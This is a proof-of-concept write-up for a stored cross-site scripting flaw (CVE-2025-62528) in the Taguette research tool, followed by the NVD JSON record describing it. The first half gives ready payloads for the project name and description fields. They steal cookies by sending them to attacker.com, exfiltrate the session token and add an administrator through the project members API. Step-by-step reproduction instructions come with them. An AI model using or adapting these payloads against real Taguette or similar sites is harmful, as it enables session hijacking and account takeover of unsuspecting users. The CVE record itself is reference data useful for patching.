CVE-2025-62528

<!-- CVE-2025-62528: Taguette Stored XSS PoC --> <!-- Vulnerability: Project name/description fields lack proper output encoding --> <!-- Affected: Taguette versions prior to 1.5.0 --> <!-- Step 1: Attacker (project member) creates or edits a project --> <!-- Step 2: Inject malicious JavaScript into the project name or description field --> <!-- PoC Payload 1: Basic cookie stealing via project name --> <script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script> <!-- PoC Payload 2: Using img tag with onerror handler (for description field) --> <img src=x onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)"> <!-- PoC Payload 3: Using SVG with onload event --> <svg onload="alert('XSS by CVE-2025-62528')"> <!-- PoC Payload 4: Stealing session and performing privileged actions --> <script> // Exfiltrate session token var sessionToken = document.cookie; // Create a new admin user or modify project settings fetch('/api/project/1/members', { method: 'POST', headers: {'Content-Type': 'application/json'}, body: JSON.stringify({email: '[email protected]', role: 'admin'}), credentials: 'include' }); // Send stolen data to attacker server new Image().src = 'https://attacker.com/log?data=' + btoa(sessionToken); </script> <!-- Reproduction Steps: --> <!-- 1. Log in to Taguette as a regular project member --> <!-- 2. Navigate to project settings --> <!-- 3. Set project name or description to one of the payloads above --> <!-- 4. Wait for project admin or other members to view the project --> <!-- 5. Malicious script executes automatically in victim's browser -->

{"cve": {"id": "CVE-2025-62528", "sourceIdentifier": "[email protected]", "published": "2025-10-20T20:15:37.723", "lastModified": "2025-10-30T17:00:08.957", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Taguette is an open source qualitative research tool. An issue has been discovered in Taguette versions prior to 1.5.0. It was possible for a project member to put JavaScript in name or description fields which would run on project load. This issue has been patched in version 1.5.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:taguette:taguette:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.5.0", "matchCriteriaId": "1B0C60DA-6D8F-4228-9178-BD1B5D53C6F7"}]}]}], "references": [{"url": "https://github.com/remram44/taguette/security/advisories/GHSA-g9qw-g6rv-3889", "source": "[email protected]", "tags": ["Issue Tracking", "Vendor Advisory"]}, {"url": "https://gitlab.com/remram44/taguette/-/issues/330", "source": "[email protected]", "tags": ["Issue Tracking", "Vendor Advisory"]}]}}